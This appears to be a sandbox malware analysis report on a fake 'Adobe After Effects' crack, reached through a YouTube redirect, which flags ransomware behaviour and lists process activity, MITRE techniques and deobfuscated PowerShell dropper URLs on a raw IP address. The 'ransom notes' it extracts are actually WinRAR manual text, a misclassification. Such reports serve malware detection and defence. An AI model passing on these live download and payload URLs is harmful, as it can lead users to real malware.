hxxps://www[.]youtube[.]com/redirect?event=video_description&redir_token=QUFFLUhqbjdjY2x2QnBESHVCTGpBQ3VoODBOOUd5X3NGZ3xBQ3Jtc0ttc19uRDVKZ1NiM0hlWlJBSWRqS0hjaVhIaGVkWmp5dF8zTC13WDl5R0tqcWlFQy1pcWxEbWZ6TTJJSXFtY0V6MDlPdExIcUs4RzJmLU1qSV9hTHM3U2dRNlFQUkctYnhXbEJfTV9nUWdZdjkyWkJqUQ&q=https%3A%2F%2Fone-clickr[.]cc%2Fadobeaftereffects&v=JJZwHzx1Xlk

Analysis

max time kernel
917s
max time network
1047s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
11-01-2023 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbjdjY2x2QnBESHVCTGpBQ3VoODBOOUd5X3NGZ3xBQ3Jtc0ttc19uRDVKZ1NiM0hlWlJBSWRqS0hjaVhIaGVkWmp5dF8zTC13WDl5R0tqcWlFQy1pcWxEbWZ6TTJJSXFtY0V6MDlPdExIcUs4RzJmLU1qSV9hTHM3U2dRNlFQUkctYnhXbEJfTV9nUWdZdjkyWkJqUQ&q=https%3A%2F%2Fone-clickr.cc%2Fadobeaftereffects&v=JJZwHzx1Xlk

Score

10^/10

ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611\Rar.txt

Ransom Note

User's Manual ~~~~~~~~~~~~~ RAR 6.11 console version ~~~~~~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=- Welcome to the RAR Archiver! -=-=-=-=-=-=-=-=-=-=-=-=-=-= Introduction ~~~~~~~~~~~~ RAR is a console application allowing to manage archive files in command line mode. RAR provides compression, encryption, data recovery and many other functions described in this manual. RAR supports only RAR format archives, which have .rar file name extension by default. ZIP and other formats are not supported. Even if you specify .zip extension when creating an archive, it will still be in RAR format. Windows users may install WinRAR, which supports more archive types including RAR and ZIP formats. WinRAR provides both graphical user interface and command line mode. While console RAR and GUI WinRAR have the similar command line syntax, some differences exist. So it is recommended to use this rar.txt manual for console RAR (rar.exe in case of Windows version) and winrar.chm WinRAR help file for GUI WinRAR (winrar.exe). Configuration file ~~~~~~~~~~~~~~~~~~ RAR and UnRAR for Unix read configuration information from .rarrc file in a user's home directory (stored in HOME environment variable) or in /etc directory. RAR and UnRAR for Windows read configuration information from rar.ini file, placed in the same directory as the rar.exe file. This file can contain the following string: switches=<any RAR switches separated by spaces> For example: switches=-m5 -s It is also possible to specify separate switch sets for individual RAR commands using the following syntax: switches_<command>=<any RAR switches separated by spaces> For example: switches_a=-m5 -s switches_x=-o+ Environment variable ~~~~~~~~~~~~~~~~~~~~ Default parameters may be added to the RAR command line by establishing an environment variable "RAR". For instance, in Unix following lines may be added to your profile: RAR='-s -md1024' export RAR RAR will use this string as default parameters in the command line and will create "solid" archives with 1024 MB sliding dictionary size. RAR handles options with priority as following: command line switches highest priority switches in the RAR variable lower priority switches saved in configuration file lowest priority Log file ~~~~~~~~ If switch -ilog is specified in the command line or configuration file, RAR will write informational messages about errors encountered while processing archives into a log file. Read the switch -ilog description for more details. The file order list for solid archiving - rarfiles.lst ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rarfiles.lst contains a user-defined file list, which tells RAR the order in which to add files to a solid archive. It may contain file names, wildcards and special entry - $default. The default entry defines the place in order list for files not matched with other entries in this file. The comment character is ';'. In Windows this file should be placed in the same directory as RAR or in %APPDATA%\WinRAR directory, in Unix - to the user's home directory or in /etc. Tips to provide improved compression and speed of operation: - similar files should be grouped together in the archive; - frequently accessed files should be placed at the beginning. Normally masks placed nearer to the top of list have a higher priority, but there is an exception from this rule. If rarfiles.lst contains such two masks that all files matched by one mask are also matched by another, that mask which matches a smaller subset of file names will have higher priority regardless of its position in the list. For example, if you have *.cpp and f*.cpp masks, f*.cpp has a higher priority, so the position of 'filename.cpp' will be chosen according to 'f*.cpp', not '*.cpp'. RAR command line syntax ~~~~~~~~~~~~~~~~~~~~~~~ Syntax RAR <command> [ -<switches> ] <archive> [ <@listfiles...> ] [ <files...> ] [ <path_to_extract\> ] Description Command is a single character or string specifying an action to be performed by RAR. Switches are designed to modify the way RAR performs such action. Other parameters are archive name and files to be archived or extracted. Listfiles are plain text files containing names of files to process. File names must start at the first column. It is possible to put comments to the listfile after // characters. For example, you can create backup.lst containing the following strings: c:\work\doc\*.txt //backup text documents c:\work\image\*.bmp //backup pictures c:\work\misc and then run: rar a backup @backup.lst If you wish to read file names from stdin (standard input), specify the empty listfile name (just @). By default, console RAR uses the single byte encoding in list files, but it can be redefined with -sc<charset>l switch. You can specify both usual file names and list files in the same command line. If neither files nor listfiles are specified, then *.* is implied and RAR will process all files. path_to_extract includes the destination directory name followed by a path separator character. For example, it can be c:\dest\ in Windows or data/ in Unix. It specifies the directory to place extracted files in 'x' and 'e' commands. This directory is created by RAR if it does not exist yet. Alternatively it can be set with -op<path> switch. Many RAR commands, such as extraction, test or list, allow to use wildcards in archive name. If no extension is specified in archive mask, RAR assumes .rar, so * means all archives with .rar extension. If you need to process all archives without extension, use *. mask. *.* mask selects all files. Wildcards in archive name are not allowed when archiving and deleting. In Unix you need to enclose RAR command line parameters containing wildcards in single or double quotes to prevent their expansion by Unix shell. For example, this command will extract *.asm files from all *.rar archives in current directory: rar e '*.rar' '*.asm' Command could be any of the following: a Add files to archive. Examples: 1) add all *.hlp files from the current directory to the archive help.rar: rar a help *.hlp 2) archive all files from the current directory and subdirectories to 362000 bytes size solid, self-extracting volumes and add the recovery record to each volume: rar a -r -v362 -s -sfx -rr save Because no file names are specified, all files (*) are assumed. 3) as a special exception, if directory name is specified as an argument and if directory name does not include file masks and trailing path separator, the entire contents of the directory and all subdirectories will be added to the archive even if switch -r is not specified. The following command will add all files from the directory Bitmaps and its subdirectories to the RAR archive Pictures.rar: rar a Pictures.rar Bitmaps 4) if directory name includes the trailing path separator, normal rules apply and you need to specify switch -r to process its subdirectories. The following command will add all files from directory Bitmaps, but not from its subdirectories, because switch -r is not specified: rar a Pictures.rar Bitmaps\* c Add archive comment. Comments are displayed while the archive is being processed. Comment length is limited to 256 KB. Examples: rar c distrib.rar Also comments may be added from a file using -z[file] switch. The following command adds a comment from info.txt file: rar c -zinfo.txt dummy ch Change archive parameters. This command can be used with most of archive modification switches to modify archive parameters. It is especially convenient for switches like -cl, -cu, -tl, which do not have a dedicated command. It is not able to recompress, encrypt or decrypt archive data and it cannot merge or create volumes. If used without any switches, 'ch' command just copies the archive data without modification. Example: Set archive time to latest file: rar ch -tl files.rar cw Write archive comment to specified file. Format of output file depends on -sc switch. If output file name is not specified, comment data will be sent to stdout. Examples: 1) rar cw arc comment.txt 2) rar cw -scuc arc unicode.txt 3) rar cw arc d Delete files from archive. If this command removes all files from archive, the empty archive is removed. e Extract files without archived paths. Extract files excluding their path component, so all files are created in the same destination directory. Use 'x' command if you wish to extract full pathnames. Example: rar e -or html.rar *.css css\ extract all *.css files from html.rar archive to 'css' directory excluding archived paths. Rename extracted files automatically in case several files have the same name. f Freshen files in archive. Updates archived files older than files to add. This command will not add new files to the archive. i[i|c|h|t]=<string> Find string in archives. Supports following optional parameters: i - case insensitive search (default); c - case sensitive search; h - hexadecimal search; t - use ANSI, UTF-8, UTF-16 and OEM (Windows only) character tables; If no parameters are specified, it is possible to use the simplified command syntax i<string> instead of i=<string> It is allowed to specify 't' modifier with other parameters, for example, ict=string performs case sensitive search using all mentioned above character tables. Examples: 1) rar "ic=first level" -r c:\*.rar *.txt Perform case sensitive search of "first level" string in *.txt files in *.rar archives on the disk c: 2) rar ih=f0e0aeaeab2d83e3a9 -r e:\texts\*.rar Search for hex string f0 e0 ae ae ab 2d 83 e3 a9 in rar archives in e:\texts directory. k Lock archive. RAR cannot modify locked archives, so locking important archives prevents their accidental modification by RAR. Such protection might be especially useful in case of RAR commands processing archives in groups. This command is not intended or able to prevent modification by other tools or willful third party. It implements a safety measure only for accidental data change by RAR. Example: rar k final.rar l[t[a],b] List archive contents [technical [all], bare]. 'l' command lists archived file attributes, size, date, time and name, one file per line. If file is encrypted, line starts from '*' character. 'lt' displays the detailed file information in multiline mode. This information includes file checksum value, host OS, compression options and other parameters. 'lta' provide the detailed information not only for files, but also for service headers like NTFS streams or file security data. 'lb' lists bare file names with path, one per line, without any additional information. You can use -v switch to list contents of all volumes in volume set: rar l -v vol.part1.rar Commands 'lt', 'lta' and 'lb' are equal to 'vt', 'vta' and 'vb' correspondingly. m[f] Move to archive [files only]. Moving files and directories results in the files and directories being erased upon successful completion of the packing operation. Directories will not be removed if 'f' modifier is used and/or '-ed' switch is applied. p Print file to stdout. Send unpacked file data to stdout. Informational messages are suppressed with this command, so they are not mixed with file data. r Repair archive. Archive repairing is performed in two stages. First, the damaged archive is searched for a recovery record (see 'rr' command). If archive contains the previously added recovery record and if damaged data area is continuous and smaller than error correction code size in recovery record, chance of successful archive reconstruction is high. When this stage has been completed, a new archive is created, named as fixed.arcname.rar, where 'arcname' is the original (damaged) archive name. If broken archive does not contain a recovery record or if archive is not completely recovered due to major damage, second stage is performed. During this stage only the archive structure is reconstructed and it is impossible to recover files which fail checksum validation, it is still possible, however, to recover undamaged files, which were inaccessible due to the broken archive structure. Mostly this is useful for non-solid archives. This stage is never efficient for archives with encrypted file headers, which can be repaired only if recovery record is present. When the second stage is completed, the reconstructed archive is saved as rebuilt.arcname.rar, where 'arcname' is the original archive name. By default, repaired archives are created in the current directory, but you can append an optional destpath\ parameter to specify another destination directory. Example: rar r buggy.rar c:\fixed\ repair buggy.rar and place the result to 'c:\fixed' directory. rc Reconstruct missing and damaged volumes using recovery volumes (.rev files). You need to specify any existing .rar or .rev volume as the archive name. Example: rar rc backup.part03.rar Read 'rv' command description for information about recovery volumes. rn Rename archived files. The command syntax is: rar rn <arcname> <srcname1> <destname1> ... <srcnameN> <destnameN> For example, the following command: rar rn data.rar readme.txt readme.bak info.txt info.bak will rename readme.txt to readme.bak and info.txt to info.bak in the archive data.rar. It is allowed to use wildcards in the source and destination names for simple name transformations

Emails

[email protected]

Extracted

Path

C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\winrar611\WhatsNew.txt

Ransom Note

WinRAR - What's new in the latest version Version 6.11 1. Added support for Gz archives with large archive comments. Previously the extraction command failed to unpack gz archives if comment size exceeded 16 KB. 2. Archive comments in gz archives are displayed in the comment window and recognized by "Show information" command. Large comments are shown partially. Previous versions didn't display Gzip comments. 3. Reserved device names followed by file extension, such as aux.txt, are extracted as is in Windows 11 even without "Allow potentially incompatible names" option or -oni command line switch. Unlike previous Windows versions, Windows 11 treats such names as usual files. Device names without extension, such as aux, still require these options to be unpacked as is regardless of Windows version. 4. Switch -mes can be also used to suppress the password prompt and abort when adding files to encrypted solid archive. 5. Additional measures to prevent extracting insecure links are implemented. 6. Bugs fixed: a) if password exceeding 127 characters was entered when unpacking an encrypted archive with console RAR, text after 127th character could be erroneously recognized as user's input by different prompts issued later; b) wrong archived file time could be displayed in overwrite prompt when extracting a file from ZIP archive. It happened if such archive included extended file times and was created in another time zone. It didn't affect the actual file time, which was set properly upon extraction. Version 6.10 1. WinRAR can unpack contents of .zst and .zipx archives utilizing Zstandard algorithm. 2. Added support of Windows 11 Explorer context menus. Beginning from Windows 11, an application can add only a single top level command or submenu to Explorer context menu. If "Cascaded context menus" in "Integration settings" dialog is on, this single item is a submenu storing all necessary WinRAR commands. If this option is off, only one extraction command for archives and one archiving command for usual files are available. You can select these commands with "Context menu items..." button in "Integration settings" dialog. 3. "Legacy context menus" option in "Settings/Integration" dialog can be used in Windows 11 if WinRAR commands are missing in "Show more options" Windows legacy context menu or in context menus of third party file managers. If WinRAR commands are already present here, keep "Legacy context menus" option turned off to prevent duplicating them. This option is not available in Windows 10 and older. 4. Windows XP is not supported anymore. Minimum required operating system version is Windows Vista. 5. "Close" item is added to "When done" list on "Advanced" page of archiving dialog. It closes WinRAR window, when archiving is done. 6. "When done" list is added to "Options" page of extraction dialog. It allows to select an action like turning a computer off or closing WinRAR after completing extraction. 7. Switch -si can be used when extracting or testing to read archive data from stdin, such as: type docs.rar | rar x -si -o+ -pmypwd dummy docs\ Even though the archive name is ignored with this switch, an arbitrary dummy archive name has to specified in the command line. Operations requiring backward seeks are unavailable in this mode. It includes displaying archive comments, testing the recovery record, utilizing the quick open information, processing multivolume archives. Prompts requiring user interaction are not allowed. Use -o[+|-|r], -p<pwd> or -mes switches to suppress such prompts. 8. New -ep4<path> switch excludes the path prefix when archiving or extracting if this path is found in the beginning of archived name. Path is compared with names already prepared to store in archive, without drive letters and leading path separators. For example: rar a -ep4texts\books archive c:\texts\books\technical removes "text\books" from archived names, so they start from 'technical'. 9. New -mes switch skips encrypted files when extracting or testing. It replaces the former -p- switch. 10. New -op<path> switch sets the destination folder for 'x' and 'e' extraction commands. Unlike <path_to_extract\> command line parameter, this switch also accepts paths without trailing path separator character. 11. If 'p' command is used to print a file to stdout, informational messages are suppressed automatically to prevent them mixing with file data. 12. "Generate archive name by mask" option and switch -ag treat only first two 'M' characters after 'H' as minutes. Previously any amount of such characters was considered as minutes. It makes possible to place the time field before the date, like -agHHMM-DDMMYY. Previous versions considered all 'M' in this string as minutes. 13. Maximum allowed size of RAR5 recovery record is increased to 1000% of protected data size. Maximum number of RAR5 recovery volumes can be 10 times larger than protected RAR volumes. Previous WinRAR versions are not able to use the recovery record to repair broken archives if recovery record size exceeds 99%. Similarly, previous versions cannot use recovery volumes if their number is equal or larger than number of RAR volumes. 14. Warning is issued if entered password exceeds the allowed limit of 127 characters and is truncated. Previously such passwords had been truncated silently. 15. If archive includes reserved device names, the underscore character is inserted in the beginning of such names when extracting. For example, aux.txt is converted to _aux.txt. It is done to prevent compatibility problems with software unable to process such names. You can use "Allow potentially incompatible names" option in "Advanced" part of extraction dialog or command line -oni switch to avoid this conversion. 16. WinRAR attempts to reset the file cache before testing an archive. It helps to verify actual data written to disk instead of reading a cached copy. 17. Multiple -v<size> switches specifying different sizes for different volumes are now allowed also for ZIP archives: WinRAR a -v100k -v200k -v300k arcname.zip Previously multiple -v<size> switches were supported only for RAR archives. 18. Switches -sl<size> and -sm<size> can be used in WinRAR.exe command line mode when extracting archives in any supported formats, provided that such archive includes unpacked file sizes. Previously these switches could filter files by size only in RAR and ZIP archives. 19. Newer folder selection dialog is invoked when pressing "Browse" button in WinRAR "Settings/Paths" page, "Repair" and "Convert" commands, also as in few other similar places. Previously a simpler XP style folder selection dialog was opened. 20. When restoring from tray after completing an operation, WinRAR window is positioned under other opened windows, to not interfere with current user activities. 21. "650 MB CD" is removed and "2 GB volumes" is added to the list of predefined volume sizes in "Define volume sizes" dialog invoked from WinRAR "Settings/Compression". 22. "Rename" command selects the file name part up to the final dot. Previously it selected the entire name. 23. If SFX archive size exceeds 4 GB, an error message is issued during compression, immediately after exceeding this threshold. Previously this error was reported only after completing compression. Executables of such size cannot be started by Windows. 24. Command line -en switch is not supported anymore. It created RAR4 archives without the end of archive record. End of archive record permits to gracefully skip external data like digital signatures. 25. Bugs fixed: a) when editing a file inside of .rar or .zip archive, WinRAR created a new SFX archive instead of updating an existing archive if "Create SFX archive" option was set in the default compression profile; b) the total progress could be displayed incorrectly when using -oi, -f, -u switches or appropriate GUI options; c) "Find files" command with "Use all tables" option and command line "it" commands failed to find strings in UTF-16 encoding. Version 6.02 1. ZIP SFX module refuses to process SFX commands stored in archive comment if such comment is resided after beginning of Authenticode digital signature. It is done to prevent possible attacks with inclusion of ZIP archive into the signature body. We already prohibited extracting contents of such malformed archives in WinRAR 6.01. We are thankful to Jacob Thompson - Mandiant Advantage Labs for reporting this issue. 2. WinRAR uses https instead of http in the web notifier window, home page and themes links. It also implements additional checks within the web notifier. This is done to prevent a malicious web page from executing existing files on a user's computer. Such attack is only possible if the intruder has managed to spoof or otherwise control user's DNS records. Some other factors are also involved in limiting the practical application of this attack. We would like to express our gratitude to Igor Sak-Sakovskiy for bringing this issue to our attention. 3. Where appropriate, SFX archive displays the additional line with detailed error information provided by operating system. For example, previously such archive would display "Cannot create file" message alone. Now this message is followed by a detailed reason like access denied or file being used by another process. In the past this extended error information was available in WinRAR, but not in SFX archives. 4. Switch -idn hides archived names also in 'v' and 'l' commands. It can be useful if only the archive type or total information is needed. 5. If -ibck -ri<priority> switches are used together, WinRAR process sets the priority specified in -ri switch. Previous versions ignored -ri and set the priority to low in the presence of -ibck switch. 6. When using "File/Change drive" command, WinRAR saves the last folder of previous drive and restores it if that drive is selected again later. 7. Name of unpacking file is now included into WinRAR incorrect password warning for RAR5 archives. It can be helpful when unpacking a non-solid archive containing files encrypted with different passwords. 8. Bugs fixed: a) "Convert archives" command issued erroneous "The specified password is incorrect" message after succesfully converting RAR archive with encrypted file names if new password was set and archive was opened in WinRAR shell; b) if command progress window was resized up and then quickly resized down to original dimensions, window contents could be positioned incorrectly. Version 6.01 1. Ctrl+A keyboard shortcut selects the entire text in WinRAR comment window. 2. If -idn switch is used together with -t or -df in console RAR when archiving, it additionally disables "Deleting <filename>" or "Testing <filename>" messages, normally issued by these switches. Also -idn disables folder creation messages when extracting a file to non-existing folder. 3. WinRAR and ZIP SFX module refuse to extract contents of ZIP SFX archives if ZIP central directory is resided after beginning of Authenticode digital signature. It is done to prevent possible attacks with inclusion of ZIP archive into signature body. 4. Bugs fixed: a) "Convert archives" command could incorrectly convert Unicode comments in RAR archives. b) if two archive information windows had been opened from Explorer context menu, the compression ratio bar in the first window could erroneously display a value for second archive. It did not affect the ratio and other text details at the right of window. Only the vertical bar at the left could be updated to a wrong value; c) if "Wait if other WinRAR copies are active" option was enabled in extraction dialog, "Waiting for another WinRAR copy" title was not set in command progress window while waiting; d) when extracting a symbolic link, previous versions did not overwrite existing symbolic links even if user requested it in overwrite prompt. Version 6.00 1. "Ignore" and "Ignore All" options are added to read error prompt. "Ignore" allows to continue processing with already read file part only and "Ignore All" does it for all future read errors. For example, if you archive a file, which portion is locked by another process, and if "Ignore" is selected in read error prompt, only a part of file preceding the unreadable region will be saved into archive. It can help to avoid interrupting lengthy archiving operations, though be aware that files archived with "Ignore" are incomplete. If switch -y is specified, "Ignore" is applied to all files by default. Previously available "Retry" and "Quit" options are still present in read error prompt as well. 2. Exit code 12 is returned in the command line mode in case of read errors. This code is returned for all options in the read error prompt, including a newly introduced "Ignore" option. Previously more common fatal error code 2 was returned for read errors. 3. If several archives are selected, "Extract archives to" option group in "Options" page of extraction dialog can be used to place extracted files to specified destination folder, to separate subfolders in destination folder, to separate subfolders in archive folders and directly to archive folders. It replaces "Extract archives to subfolders" option and available only if multiple archives are selected. 4. New -ad2 switch places extracted files directly to archive's own folder. Unlike -ad1, it does not create a separate subfolder for each unpacked archive. 5. "Additional switches" option in "Options" page of archiving and extraction dialogs allows to specify WinRAR command line switches. It might be useful if there is no option in WinRAR graphical interface matching a switch. Use this feature only if you are familiar with WinRAR command line syntax and clearly understand what specified switches are intended for. 6. Compression parameters in "Benchmark" command are changed to 32 MB dictionary and "Normal" method. They match RAR5 default mode and more suitable to estimate the typical performance of recent WinRAR versions than former 4 MB "Best" intended for RAR4 format. Latest "Benchmark" results cannot be compared with previous versions directly. New parameters set produces different values, likely lower because of eight times larger dictionary size. 7. When unpacking a part of files from solid volume set, WinRAR attempts to skip volumes in the beginning and

URLs

https

http

http://weirdsgn.com

http://icondesignlab.com

https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://135.181.123.26/sccp32.dll

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://135.181.123.26/rundll32.bat

Signatures

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
3684	Adobe.After.Effects.exe
1732	Adobe.After.Effects.tmp
2132	winrar611.exe
1772	Adobe.After.Effects.exe
1016	Adobe.After.Effects.tmp
1212	Adobe.After.Effects.2023.v23.0.0.59.exe
1516	Adobe.After.Effects.2023.v23.0.0.59.exe

Loads dropped DLL 2 IoCs

pid	Process
1732	Adobe.After.Effects.tmp
1016	Adobe.After.Effects.tmp

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\AUTORUN.inf	Adobe.After.Effects.2023.v23.0.0.59.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\AUTORUN.inf	Adobe.After.Effects.2023.v23.0.0.59.exe
File created	C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\AUTORUN.inf	Adobe.After.Effects.2023.v23.0.0.59.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\RarSFX1\AfterEffects2023\AUTORUN.inf	Adobe.After.Effects.2023.v23.0.0.59.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2136	416	WerFault.exe	146
3912	3328	WerFault.exe	145

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers network information 2 TTPs 8 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2384	ipconfig.exe
3068	ipconfig.exe
1384	ipconfig.exe
1436	ipconfig.exe
1312	ipconfig.exe
1532	ipconfig.exe
4040	ipconfig.exe
2728	ipconfig.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
528	vlc.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3272	chrome.exe
3272	chrome.exe
4548	chrome.exe
4548	chrome.exe
2796	chrome.exe
2796	chrome.exe
3544	chrome.exe
3544	chrome.exe
4628	chrome.exe
4628	chrome.exe
4532	chrome.exe
4532	chrome.exe
3964	chrome.exe
3964	chrome.exe
4752	chrome.exe
4752	chrome.exe
4548	chrome.exe
4548	chrome.exe
3304	chrome.exe
3304	chrome.exe
1464	chrome.exe
1464	chrome.exe
1464	chrome.exe
1464	chrome.exe
204	chrome.exe
204	chrome.exe
416	chrome.exe
416	chrome.exe
1732	Adobe.After.Effects.tmp
1732	Adobe.After.Effects.tmp
1016	Adobe.After.Effects.tmp
1016	Adobe.After.Effects.tmp
3704	powershell.exe
3704	powershell.exe
3704	powershell.exe
4036	powershell.exe
4036	powershell.exe
4036	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
528	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	1768	7zG.exe
Token: 35	1768	7zG.exe
Token: SeSecurityPrivilege	1768	7zG.exe
Token: SeSecurityPrivilege	1768	7zG.exe
Token: SeRestorePrivilege	4912	7zG.exe
Token: 35	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeRestorePrivilege	4864	7zG.exe
Token: 35	4864	7zG.exe
Token: SeSecurityPrivilege	4864	7zG.exe
Token: SeSecurityPrivilege	4864	7zG.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of SendNotifyMessage 59 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe
528	vlc.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
528	vlc.exe
2132	winrar611.exe
2132	winrar611.exe
2132	winrar611.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4548 wrote to memory of 3480	4548	chrome.exe	66
PID 4548 wrote to memory of 3480	4548	chrome.exe	66
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3452	4548	chrome.exe	69
PID 4548 wrote to memory of 3272	4548	chrome.exe	68
PID 4548 wrote to memory of 3272	4548	chrome.exe	68
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
PID 4548 wrote to memory of 2372	4548	chrome.exe	70
